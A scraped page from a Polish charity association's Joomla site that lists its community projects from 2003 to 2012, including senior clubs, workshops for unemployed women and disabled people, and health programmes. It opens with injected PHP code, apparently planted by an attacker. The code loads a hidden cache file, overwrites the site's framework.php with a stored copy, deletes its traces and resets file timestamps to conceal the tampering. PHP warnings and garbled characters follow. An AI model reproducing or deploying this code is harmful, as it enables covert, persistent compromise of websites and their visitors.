$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 426
Projekty realizowane przez stowarzyszenie
 
Projekty realizowane przez stowarzyszenie

Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Projekt „Profilaktyka i promocja zdrowia w Klubie Seniora Wrzos” 2010 rok

Projekt realizowany w ramach Programu Wspierania Aktywności Lokalnej RAZEM MOŻEMY WIĘCEJ. Uczestnikami byli członkowie Klubu Seniora Wrzos Uczestnicy korzystali z zajęć z lekarzem, pielęgniarką, trenerem treningów interpersonalnych. Ponadto uczestniczyli w zajęciach rehabilitacyjnych i pobytów w grocie solnej. Zorganizowano też wycieczkę do Szaflar na źródła termalne .

 

Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Projekt „Wyrównać szanse –warsztaty aktywizujące dla kobiet „ 2008 rok

P1000441Projekt finansowany ze środków Unii Europejskiej z Programu Operacyjnego Kapitał Ludzki Instytucją pośredniczącą II stopnia jest Wojewódzki Urząd Pracy. W projekcie uczestniczyło 20 bezrobotnych kobiet z terenu gminy Gnojnik w wieku 25-40 lat. Zajęcia odbywały się 2 razy w tyg po 3 godz. W programie były zajęcia z psychologiem ,trening interpersonalny , spotkania z doradcami zawodowymi i zajęcia z informatykiem.

 

 

 

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
I Gnojnickie Święto Ziemniaka

20120922-IMG 8498„.Impreza w całości finansowana ze środków Stowarzyszenia odbyła się 22.09.2012.Ze względu na kapryśną pogodę świętowano na hali sportowej w Gnojniku .Duży wkład w organizację i przeprowadzenie całej imprezy mieli członkowie Stowarzyszenia –pracownicy Warsztatu Terapii zajęciowej oraz członkowie Klubu Seniora „Wrzos „. W imprezie uczestniczyli oprócz mieszkańców Gnojnika również kuracjusze Ośrodka Wypoczynkowo-Rehabilitacyjnego EWA w Gnojniku. W tym okresie w ORW EWA wypoczywały osoby z różnych stron Polski min. z Kaszub i Mazur, Gdańska, Śląska , Mazowsza…Przebywająca grupa uczestników WTZ z Koniecwału i Bytowa czynnie włączyła się do uczestnictwa we współzawodnictwie w różnych konkursach/ obieranie ziemniaków na czas, jedzenie gotowanych ziemniaków, piosenki i wiersze o ziemniaku , konkurs wiedzy na temat ziemniaka…/.Przepyszne potrawy z ziemniaków przygotowali Seniorzy.imprezę uświetnił swoim występem zespół Szkraby z Gnojnika.

 

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Projekt „ Ćwicz razem z nami „ 2012 rok

P1050223Projekt współfinansowany przez Starostwo powiatowe w Brzesku w ramach dofinansowania zadania publicznego Ochrona i promocja zdrowia. Realizowany w okresie 07.2012 do 30.11.2012 roku. Przeznaczony dla osób po 50 roku życia. W ramach projektu 30 osób z terenu powiatu uczestniczyło w zajęciach rehabilitacyjnych i pogadankach o tematyce prozdrowotnej. Uczestnicy projektu korzystali z seansów w grocie solnej , wykonywali wiele ćwiczeń usprawniających kondycję fizyczną . Można było pobiegać na bieżniach, pojeździć na rowerkach i ćwiczyć na drabinkach, rotorach, wiosłach czy Ugulach.

 

 

 

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Projekt „ W zdrowym ciele zdrowy duch” 2011 rok

Projekt współfinansowany przez Starostwo powiatowe w Brzesku w ramach dofinansowania zadania publicznego Ochrona i promocja zdrowia. Realizowany w okresie Uczestnikami były osoby po 40 roku życia mieszkający na terenie powiatu brzeskiego. W czasie realizacji projektu benificjencji korzystali z sal fizykoterapii zakładu rehabilitacji w Centrum Medycyny Rodzinnej w Gnojniku ,ponadto korzystali z seansów w grocie solnej. Chętnych było dużo , ale dofinansowanie dotyczyło grupy 30 osobowej.

 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Projekt „koło Gospodyń Wiejskich – szansa edukacyjna i społeczna „ 2010 rok

Realizowany w ramach programu operacyjnego Kapitał Ludzki , Priorytet IX – Rozwój wykształcenia i kompetencji w regionie ; Działanie 9.5 –Oddolne inicjatywy edukacyjne na obszarach wiejskich W warsztatach uczestniczyło 20 bezrobotnych kobiet z terenu gminy Gnojnik wieku ponad 18 lat. Prowadzone były zajęcia z psychoedukacji i treningu interpersonalnego elementami doradztwa zawodowego , zajęcia z informatykiem oraz kurs pieczenia ciast na każdą okazję.. Spotkania odbywały się 2 razy w tygodniu po 3 godziny w salach wykładowych Centrum Medycyny Rodzinnej w Gnojniku . Efektem projektu było utworzenie Koła Gospodyń Wiejskich

 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Projekt „Klub 50 + Razem łatwiej rok 2010

Andrzejki 2010Realizowany w ramach programu operacyjnego Kapitał Ludzki , Priorytet VII - Promocja Integracji Społecznej ;Działanie 7.3 Inicjatywy lokalne na rzecz aktywnej integracji. Wsparciem objęta była 20 osobowa grupa kobiet i mężczyzn /powyżej 50 roku życia / z terenu Gminy Gnojnik chcąca działać na rzecz środowiska ludzi starszych na terenach wiejskich. Utworzony został Klub Seniora „Wrzos”. Spotkania warsztatowe odbywały się 2 razy w tygodniu po 3 godziny w salach wykładowych należących do Centrum Medycyny Rodzinnej w Gnojniku. ‘ Prowadzone były zajęcia z psychoedukacji i treningu interpersonalnego, spotkania z doradcami zawodowymi oraz zajęcia z informatykiem .

 

 

 

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Projekt „Przez warsztaty do aktywności zawodowej „

P1020235Projekt finansowany ze środków Unii Europejskiej z Programu Operacyjnego Kapitał Ludzki Instytucją pośredniczącą II stopnia jest Wojewódzki Urząd Pracy. W projekcie uczestniczą bezrobotne kobiety powyżej 25 r.ż. z terenu miasta i gminy Brzesko. 

 

 

 

 

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Projekt „Sprawny inaczej nie znaczy gorszy„ - 2007


P10180124Projekt współfinansowany ze środków Funduszu Inicjatyw Obywatelskich . Uczestnikami było 30 osób niepełnosprawnych ,bezrobotnych z terenu powiatu brzeskiego. Poprzez udział w projekcie  ,wsparcie psychologiczne i trening interpersonalny  osoby niepełnosprawne zdobywały i doskonaliły umiejętności przydatne w kontaktach zawodowych, uczyły się sposobu rozwiązywania konfliktów, radzenia sobie ze stresem.

 

 

 

 

 

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Projekt „Wspólnie z EFS pokonamy bariery – warsztaty psychologiczne „ 2005-2006 rok

2Projekt współfinansowany z Europejskiego Funduszu Społecznego. Polegał na prowadzeniu warsztatów z zakresu psychoedukacji i treningu interpersonalnego dla osób niepełnosprawnych. W projekcie uczestniczyło 20 osób niepełnosprawnych z terenu powiatu brzeskiego, bocheńskiego i tarnowskiego. Szkolenie wymagało od uczestników sporej aktywności. Przez rok spotykali się 3 razy w tygodniu. Stowarzyszenie podejmuje coraz ambitniejsze zadania. Tym razem jako pierwsza organizacja pozarządowa ,której siedziba mieści się na wsi realizowaliśmy projekt finansowany z EFS. Projekt realizowany był od 1.10.2005 do 31.12.2006.

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Projekt „Oni też potrafią 2004 rok

Projekt "Oni też potrafią". Projekt współfinansowany przez PFRON .Polegał na wyjazdach  20 niepełnosprawnych dzieci wraz z opiekunami na krytą pływalnię do Brzeska  przez okres 2 miesięcy. Udział brały dzieci z terenu Gminy Gnojnik i Czchów. Realizowany projekt miał wykazać, że niepełnosprawne dziecko też potrafi nauczyć się pływać.

 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Projekt „Pożyteczne ferie 2003

Projekt „Pożyteczne ferie „  realizowany przy pomocy  z dotacji Fundacji Wspomagania Wsi  .Projekt realizowany był na terenie Publicznej Szkoły Podstawowej w Gnojniku i nosił tytuł ”Zamiast graffiti na murach bazgroły – malujemy okna naszej szkoły „.W trakcie ferii uczniowie tej szkoły brali udział w zajęciach plastycznych a efektem były pięknie pomalowane szyby  okien budynku szkoły . Malowane obrazy przedstawiały uroki zimy.

 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Powiatowy Program Profilaktyki zakażeń HIV/AIDS 2003-2003

Powiatowy  Program Profilaktyki zakażeń HIV/AIDS  ,który uzyskał akceptację Krajowego Centrum ds. AIDS .Otrzymana dotacja i środki własne stowarzyszenia pozwoliły na przeprowadzenia szkoleń na terenie wszystkich gmin powiatu brzeskiego przez trenerów legitymujących się certyfikatami UNDP, ONZ oraz Krajowego Centrum  ds. AIDS.

W projekcie wzięło udział około 100 osób nauczycieli , pracowników pomocy społecznej i pracowników służby zdrowia. Uczestnicy projektu otrzymali certyfikaty.

 


Pomagaj razem z nami, moesz przekaza� swoj darowizne za po�rednictwem internetu
Pomoc ofiarom wypadkw komunikacyjnych
Projekty Aktywizujce
Zielone Ochronki
Spartakiady
Warsztaty Terapi Zajciowej w Zawadzie Uszewskiej
 

Copyright © Stowarzyszenie "Pomocna Do"